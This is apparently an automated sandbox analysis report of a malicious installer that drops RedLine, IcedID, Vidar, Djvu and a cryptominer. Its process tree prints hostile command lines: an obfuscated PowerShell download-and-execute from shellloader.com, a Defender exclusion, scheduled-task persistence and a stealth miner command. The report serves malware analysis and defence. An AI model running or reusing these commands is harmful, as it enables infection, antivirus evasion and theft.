Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    46s
  • max time network
    1205s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    20-09-2021 08:28

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

redline

Botnet

janesam

C2

65.108.20.195:6774

Extracted

Family

icedid

Campaign

3162718704

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 45 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 15 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2708
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2700
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2608
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:4900
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2460
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2416
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1296
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1192
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1072
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:696
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                            PID:4592
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:6296
                                • C:\Windows\SysWOW64\schtasks.exe
                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:6328
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                                PID:6676
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:6684
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  2⤵
                                    PID:7276
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:2276
                                    • C:\Users\Admin\AppData\Roaming\iduedjc
                                      C:\Users\Admin\AppData\Roaming\iduedjc
                                      2⤵
                                        PID:4144
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                          PID:6816
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:6612
                                          • C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe
                                            C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe --Task
                                            2⤵
                                              PID:3168
                                              • C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe
                                                C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe --Task
                                                3⤵
                                                  PID:5468
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                  PID:5928
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    3⤵
                                                      PID:4400
                                                  • C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe
                                                    C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c\C819.exe --Task
                                                    2⤵
                                                      PID:7808
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                        PID:8140
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                      1⤵
                                                        PID:1012
                                                      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                        1⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2872
                                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3924
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\setup_install.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\setup_install.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3928
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3700
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                5⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4264
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2100
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun1917b8fb5f09db8.exe
                                                                Sun1917b8fb5f09db8.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:4464
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3776
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun19262b9e49ad.exe
                                                                Sun19262b9e49ad.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4252
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                  6⤵
                                                                  • Blocklisted process makes network request
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:5840
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:4736
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4100
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun193fda712d9f1.exe
                                                                Sun193fda712d9f1.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:4452
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4116
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun19e4ade31b2a.exe
                                                                Sun19e4ade31b2a.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4164
                                                                • C:\Users\Admin\AppData\Roaming\8063900.scr
                                                                  "C:\Users\Admin\AppData\Roaming\8063900.scr" /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4364
                                                                • C:\Users\Admin\AppData\Roaming\7872543.scr
                                                                  "C:\Users\Admin\AppData\Roaming\7872543.scr" /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5100
                                                                • C:\Users\Admin\AppData\Roaming\2804141.scr
                                                                  "C:\Users\Admin\AppData\Roaming\2804141.scr" /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2180
                                                                • C:\Users\Admin\AppData\Roaming\7436995.scr
                                                                  "C:\Users\Admin\AppData\Roaming\7436995.scr" /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:1796
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
                                                              4⤵
                                                                PID:4184
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun19de8ff4b6aefeb8.exe
                                                                  Sun19de8ff4b6aefeb8.exe /mixone
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:4672
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 656
                                                                    6⤵
                                                                    • Program crash
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4112
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 672
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:5648
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 680
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:6128
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 656
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:2080
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 888
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:4936
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 976
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:4892
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1176
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:4540
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1140
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:6288
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1292
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:6500
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1232
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:6740
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4212
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun191101c1aaa.exe
                                                                  Sun191101c1aaa.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4280
                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4220
                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4668
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                        8⤵
                                                                          PID:4600
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                            9⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4132
                                                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                          8⤵
                                                                            PID:816
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                              9⤵
                                                                                PID:6396
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                  10⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4872
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                9⤵
                                                                                  PID:5164
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                  9⤵
                                                                                    PID:7348
                                                                              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2780
                                                                                • C:\ProgramData\6834689.exe
                                                                                  "C:\ProgramData\6834689.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5844
                                                                                • C:\ProgramData\6660454.exe
                                                                                  "C:\ProgramData\6660454.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:5292
                                                                                • C:\ProgramData\5612667.exe
                                                                                  "C:\ProgramData\5612667.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:1316
                                                                                • C:\ProgramData\4594268.exe
                                                                                  "C:\ProgramData\4594268.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:1652
                                                                              • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5040
                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                  8⤵
                                                                                    PID:2380
                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5544
                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4360
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 808
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:5456
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 796
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:5928
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 860
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:4208
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 964
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:5672
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 968
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:5576
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 952
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:1364
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1088
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:4952
                                                                                • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3684
                                                                                • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:656
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5932
                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4748
                                                                                • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1092
                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2088
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-M193I.tmp\setup_2.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-M193I.tmp\setup_2.tmp" /SL5="$20284,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:4712
                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5436
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-JMEBS.tmp\setup_2.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-JMEBS.tmp\setup_2.tmp" /SL5="$3029C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                        10⤵
                                                                                          PID:5624
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-5EAON.tmp\postback.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-5EAON.tmp\postback.exe" ss1
                                                                                            11⤵
                                                                                              PID:5840
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                explorer.exe ss1
                                                                                                12⤵
                                                                                                  PID:1152
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                    13⤵
                                                                                                      PID:4640
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                        14⤵
                                                                                                          PID:6200
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\aa3CalSXW.dll"
                                                                                                        13⤵
                                                                                                          PID:6992
                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\aa3CalSXW.dll"
                                                                                                            14⤵
                                                                                                              PID:6472
                                                                                                              • C:\Windows\system32\regsvr32.exe
                                                                                                                /s "C:\Users\Admin\AppData\Local\Temp\aa3CalSXW.dll"
                                                                                                                15⤵
                                                                                                                  PID:6804
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\aa3CalSXW.dllXe0Zcduav.dll"
                                                                                                              13⤵
                                                                                                                PID:7384
                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                  regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\aa3CalSXW.dllXe0Zcduav.dll"
                                                                                                                  14⤵
                                                                                                                    PID:7620
